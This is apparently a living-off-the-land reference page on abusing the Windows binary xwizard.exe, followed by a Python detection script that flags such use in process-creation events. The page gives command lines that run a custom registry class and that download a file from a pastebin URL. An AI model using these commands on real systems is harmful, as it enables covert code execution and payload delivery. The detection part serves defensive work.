~/Privilege Escalation/Windows/Binaries# cat Xwizard.exe.md

Paths:

C:\Windows\System32\xwizard.exe
C:\Windows\SysWOW64\xwizard.exe

Detection:

Execute

Xwizard.exe running a custom class that has been added to the registry.

xwizard RunWizard {00000001-0000-0000-0000-0000FEEDACDC}

Xwizard.exe running a custom class that has been added to the registry. The /t and /u switches prevent an error message in later Windows 10 builds.

xwizard RunWizard /taero /u {00000001-0000-0000-0000-0000FEEDACDC}

Download

Xwizard.exe uses the RemoteApp and Desktop Connections wizard to download a file.

xwizard RunWizard {7940acf8-60ba-4213-a7c3-f3b400ee266d} /zhttps://pastebin.com/raw/iLxUT5gM
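Detection logic for the command lines above, as an added example that is not part of the original page: it classifies process-creation events where xwizard.exe is started with RunWizard and a CLSID, with a /z URL argument, or from a path other than the two listed under Paths. The event tuples, the tag names and the example.invalid URL are constructed for illustration; feed it the image path and command line from whatever process-creation telemetry you collect.

```python
import re

# Paths this page lists for the binary; anything else named xwizard.exe is flagged.
KNOWN_PATHS = {
    r"c:\windows\system32\xwizard.exe",
    r"c:\windows\syswow64\xwizard.exe",
}
GUID = r"\{[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}\}"
# RunWizard followed (after optional switches such as /taero /u) by a CLSID.
RUNWIZARD = re.compile(r"\bRunWizard\b.*?(" + GUID + ")", re.I)
# The /z switch with an http(s) URL glued to it, as in the Download command.
Z_URL = re.compile(r"(?:^|\s)/z(https?://\S+)", re.I)


def classify(image, cmdline):
    """Return a list of (tag, detail) findings for one process-creation event."""
    findings = []
    if not image.lower().endswith("\\xwizard.exe"):
        return findings  # not xwizard.exe at all
    if image.lower() not in KNOWN_PATHS:
        findings.append(("unexpected_path", image))
    m = RUNWIZARD.search(cmdline)
    if m:
        findings.append(("runwizard_clsid", m.group(1).lower()))
        u = Z_URL.search(cmdline)
        if u:
            findings.append(("download_url", u.group(1)))
    return findings


# Constructed sample events: (image path, command line).
SAMPLE_EVENTS = [
    (r"C:\Windows\System32\xwizard.exe",
     "xwizard RunWizard /taero /u {00000001-0000-0000-0000-0000FEEDACDC}"),
    (r"C:\Windows\SysWOW64\xwizard.exe",
     "xwizard RunWizard {7940acf8-60ba-4213-a7c3-f3b400ee266d} /zhttps://example.invalid/file.txt"),
    (r"C:\Users\Public\xwizard.exe", "xwizard.exe"),
    (r"C:\Windows\System32\notepad.exe", "notepad.exe notes.txt"),
]


def scan(events):
    """Keep only events with at least one finding."""
    return [(img, cmd, f) for img, cmd in events if (f := classify(img, cmd))]


if __name__ == "__main__":
    for img, cmd, found in scan(SAMPLE_EVENTS):
        print(img, "|", cmd, "->", found)
```

The CLSID in each runwizard_clsid finding can then be compared against the classes registered on the host to separate built-in wizards from custom classes added to the registry.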